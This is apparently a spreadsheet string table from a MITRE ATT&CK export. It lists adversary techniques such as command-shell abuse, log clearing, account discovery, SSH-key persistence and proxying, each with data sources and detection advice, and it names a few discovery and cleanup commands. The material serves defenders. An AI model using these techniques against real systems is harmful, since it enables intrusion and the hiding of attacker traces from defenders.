    <t>Monitor for execution of AppleScript through &lt;code&gt;osascript&lt;/code&gt; and usage of the &lt;code&gt;NSAppleScript&lt;/code&gt; and &lt;code&gt;OSAScript&lt;/code&gt; APIs that may be related to other suspicious behavior occurring on the system.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[Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.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</si>
  <si>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</si>
  <si>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T1059.003</t>
  </si>
  <si>
    <t>Windows Command Shell</t>
  </si>
  <si>
    <t>Windows event logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Usage of the Windows command shell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</si>
  <si>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Adversaries may abuse the Windows command shell for execution. The Windows command shell (&lt;code&gt;cmd.exe&lt;/code&gt;) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.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&lt;code&gt;cmd.exe&lt;/code&gt; to execute various commands and payloads. Common uses include &lt;code&gt;cmd.exe /c&lt;/code&gt; to execute a single command, or abusing &lt;code&gt;cmd.exe&lt;/code&gt; interactively with input and output forwarded over a command and control channel.</t>
  </si>
  <si>
    <t>T1059.004</t>
  </si>
  <si>
    <t>Unix Shell</t>
  </si>
  <si>
    <t>macOS,Linux</t>
  </si>
  <si>
    <t xml:space="preserve">Unix shell usage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</si>
  <si>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</si>
  <si>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T1059.005</t>
  </si>
  <si>
    <t>Visual Basic</t>
  </si>
  <si>
    <t>DLL monitoring,Loaded DLLs,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,macOS,Linux</t>
  </si>
  <si>
    <t>Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB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programable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.</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</si>
  <si>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[JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007)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t>
  </si>
  <si>
    <t>T1059.006</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Process command-line parameters,API monitoring</t>
  </si>
  <si>
    <t>Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity.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</si>
  <si>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</si>
  <si>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T1059.007</t>
  </si>
  <si>
    <t>JavaScript/JScript</t>
  </si>
  <si>
    <t>Loaded DLLs,DLL monitoring,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting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programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Adversaries may abuse JavaScript and/or JScript for execution. JavaScript (JS) is a platform-agnostic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Adversaries may abuse JavaScript / JScript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</si>
  <si>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T1059.008</t>
  </si>
  <si>
    <t>Network Device CLI</t>
  </si>
  <si>
    <t>Network device logs,Network device run-time memory,Network device command history,Network device configuration</t>
  </si>
  <si>
    <t>Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)
Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.</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</si>
  <si>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secure shell (SSH).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 (Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>Graphical User Interface</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</si>
  <si>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t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.**
The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.</t>
  </si>
  <si>
    <t>Hypervisor</t>
  </si>
  <si>
    <t>System calls</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</si>
  <si>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 (Citation: virtualization.info 2006)</t>
  </si>
  <si>
    <t>**This technique has been deprecated and should no longer be used.**
A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.</t>
  </si>
  <si>
    <t>persistence</t>
  </si>
  <si>
    <t>Scripting</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,Process command-line parameters</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</si>
  <si>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Analyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)</t>
  </si>
  <si>
    <t>**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**
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[PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.
Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.
Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>defense-evasion,execution</t>
  </si>
  <si>
    <t>Process whitelisting,Data Execution Prevention,Exploit Prevention</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>Windows Error Reporting,Process monitoring,Application logs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</si>
  <si>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Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to collect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</si>
  <si>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privilege-escalation</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Office 365,Azure AD,AWS,GCP,Azure,SaaS</t>
  </si>
  <si>
    <t>Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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T1069.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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T1069.003</t>
  </si>
  <si>
    <t>Cloud Groups</t>
  </si>
  <si>
    <t>GCP audit logs,Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Office 365,Azure AD,GCP,SaaS,Azure,AWS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</si>
  <si>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Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.</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</si>
  <si>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accounts.(Citation: Microsoft Msolrole)(Citation: GitHub Raindance)
Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms.</t>
  </si>
  <si>
    <t>Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/*.
These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.</t>
  </si>
  <si>
    <t>Log analysis,Host intrusion prevention systems,Anti-virus</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>Clear Windows Event Logs</t>
  </si>
  <si>
    <t>API monitoring,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: "The audit log was cleared").</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</si>
  <si>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t>
  </si>
  <si>
    <t>Anti Virus,Host Intrusion Prevention Systems,Log Analysis</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.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</si>
  <si>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</si>
  <si>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T1070.003</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>Process command-line parameters,PowerShell logs,File monitoring,Authentication logs</t>
  </si>
  <si>
    <t>User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file can be an indicator of suspicious activity.
Monitor for suspicious modifications or deletion of &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; and use of the &lt;code&gt;Clear-History&lt;/code&gt; command.</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</si>
  <si>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</si>
  <si>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Host forensic analysis,Log analysis</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>Binary file metadata,Process command-line parameters,File monitoring</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</si>
  <si>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</si>
  <si>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Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary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 Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>Authentication logs,Packet capture,Process command-line parameters,Process monitoring</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</si>
  <si>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</si>
  <si>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Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>Timestomp</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Layer Protocol</t>
  </si>
  <si>
    <t>DNS records,Network protocol analysis,Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Adversaries may communicate using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</si>
  <si>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T1071.001</t>
  </si>
  <si>
    <t>Web Protocols</t>
  </si>
  <si>
    <t>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t xml:space="preserve">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web traffic to/from known-bad or suspicious domains. </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</si>
  <si>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 and HTTPS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</si>
  <si>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T1071.002</t>
  </si>
  <si>
    <t>File Transfer Protocols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</si>
  <si>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used.(Citation: University of Birmingham C2)</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</si>
  <si>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</si>
  <si>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T1071.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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T1071.004</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,DNS records,Process monitoring,Process use of network,Packet capture</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</si>
  <si>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DNS traffic to/from known-bad or suspicious domains.</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</si>
  <si>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</si>
  <si>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Software Deployment Tools</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</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</si>
  <si>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Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.
Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</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</si>
  <si>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VNC, HBSS, Altiris, etc.).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</si>
  <si>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execution,lateral-movement</t>
  </si>
  <si>
    <t>Data Staged</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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1059/001).</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</si>
  <si>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</si>
  <si>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T1074.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1074.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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Valid Accounts</t>
  </si>
  <si>
    <t>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure,SaaS,Office 365,Azure AD</t>
  </si>
  <si>
    <t>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Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</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</si>
  <si>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 (Citation: TechNet Credential Theft)</t>
  </si>
  <si>
    <t>defense-evasion,persistence,privilege-escalation,initial-access</t>
  </si>
  <si>
    <t>Firewall,Host intrusion prevention systems,Network intrusion detection system,Application control,System access controls,Anti-virus</t>
  </si>
  <si>
    <t>T1078.001</t>
  </si>
  <si>
    <t>Default Accounts</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure,Office 365,Azure AD,SaaS</t>
  </si>
  <si>
    <t>Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019)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t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>Domain Accounts</t>
  </si>
  <si>
    <t>Authentication logs,Process monitoring</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</si>
  <si>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accounts to detect accounts that may have been created by an adversary for persistence.</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: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t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>Local Accounts</t>
  </si>
  <si>
    <t>Authentication logs</t>
  </si>
  <si>
    <t>Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1078.004</t>
  </si>
  <si>
    <t>Cloud Accounts</t>
  </si>
  <si>
    <t>Azure activity logs,Authentication logs,AWS CloudTrail logs,Stackdriver logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,SaaS,Azure AD,Office 365</t>
  </si>
  <si>
    <t>Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.</t>
  </si>
  <si>
    <t>Taint Shared Content</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</si>
  <si>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</si>
  <si>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</si>
  <si>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System Information Discovery</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process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</si>
  <si>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In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.</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</si>
  <si>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A breakdown of system data can also be gathered through the macOS &lt;code&gt;systemsetup&lt;/code&gt; command, but it requires administrative privileges.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</si>
  <si>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File and Directory Discovery</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</si>
  <si>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</si>
  <si>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 (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.
Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups.</t>
  </si>
  <si>
    <t>T1087.003</t>
  </si>
  <si>
    <t>Email Account</t>
  </si>
  <si>
    <t>Office 365 account logs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,Office 365</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1087.004</t>
  </si>
  <si>
    <t>Cloud Account</t>
  </si>
  <si>
    <t>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,Office 365,Azure AD,SaaS</t>
  </si>
  <si>
    <t>Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</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</si>
  <si>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</si>
  <si>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Proxy</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>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Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).</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</si>
  <si>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</si>
  <si>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T1090.001</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Network protocol analysis,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows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</si>
  <si>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</si>
  <si>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T1090.002</t>
  </si>
  <si>
    <t>External Proxy</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external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</si>
  <si>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</si>
  <si>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T1090.003</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>Packet capture,Network protocol analysis,Netflow/Enclave netflow</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</si>
  <si>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
In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers.  Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization.  Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted.  Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.</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</si>
  <si>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</si>
  <si>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T1090.004</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Packet capture</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</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</si>
  <si>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</si>
  <si>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Replication Through Removable Media</t>
  </si>
  <si>
    <t>File monitoring,Data loss prevention</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</si>
  <si>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</si>
  <si>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</si>
  <si>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lateral-movement,initial-access</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</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</si>
  <si>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</si>
  <si>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Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</t>
  </si>
  <si>
    <t>Windows,Linux,macOS,Network</t>
  </si>
  <si>
    <t>Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)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 
Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.</t>
  </si>
  <si>
    <t>Adversaries may use a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 (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Windows,Office 365,Azure,GCP,Azure AD,AWS,Linux,macOS</t>
  </si>
  <si>
    <t>Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.</t>
  </si>
  <si>
    <t>Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves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t>
  </si>
  <si>
    <t>T1098.001</t>
  </si>
  <si>
    <t>Additional Cloud Credentials</t>
  </si>
  <si>
    <t>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs</t>
  </si>
  <si>
    <t>Azure AD,Azure,AWS,GCP</t>
  </si>
  <si>
    <t>Monitor Azure Activity Logs for service principal modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.</t>
  </si>
  <si>
    <t>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
Adversaries may add credentials for Azure Service Principals in addition to existing legitimate credentials(Citation: Create Azure Service Principal) to victim Azure accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) Azure Service Principals support both password and certificate credentials.(Citation: Why AAD Service Principals) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules.(Citation: Demystifying Azure AD Service Principals)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t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>Exchange Email Delegate Permissions</t>
  </si>
  <si>
    <t>Office 365 audit logs</t>
  </si>
  <si>
    <t>Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.</t>
  </si>
  <si>
    <t>Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account.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This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights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t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>Add Office 365 Global Administrator Role</t>
  </si>
  <si>
    <t>Office 365</t>
  </si>
  <si>
    <t xml:space="preserve">Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. </t>
  </si>
  <si>
    <t>An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) 
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.</t>
  </si>
  <si>
    <t>T1098.004</t>
  </si>
  <si>
    <t>SSH Authorized Keys</t>
  </si>
  <si>
    <t>Use file integrity monitoring to detect changes made to the &lt;code&gt;authorized_keys&lt;/code&gt; file for each user on a system. Monitor for suspicious processes modifying the &lt;code&gt;authorized_keys&lt;/code&gt; file.
Monitor for changes to and suspicious processes modifiying &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.</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</si>
  <si>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This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</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</si>
  <si>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activity.(Citation: University of Birmingham C2)</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</si>
  <si>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</si>
  <si>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T1102.001</t>
  </si>
  <si>
    <t>Dead Drop Resolver</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</si>
  <si>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User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</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</si>
  <si>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</si>
  <si>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T1102.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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T1102.003</t>
  </si>
  <si>
    <t>One-Way Communication</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</si>
  <si>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User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</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</si>
  <si>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</si>
  <si>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Multi-Stage Channels</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ingress Tool Transfer</t>
  </si>
  <si>
    <t>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred into the network.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</si>
  <si>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Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>System calls,Loaded DLLs,API monitoring,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions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 
Utilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. </t>
  </si>
  <si>
    <t>Adversaries may directly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Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries.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abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.</t>
  </si>
  <si>
    <t>Redundant Access</t>
  </si>
  <si>
    <t>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</t>
  </si>
  <si>
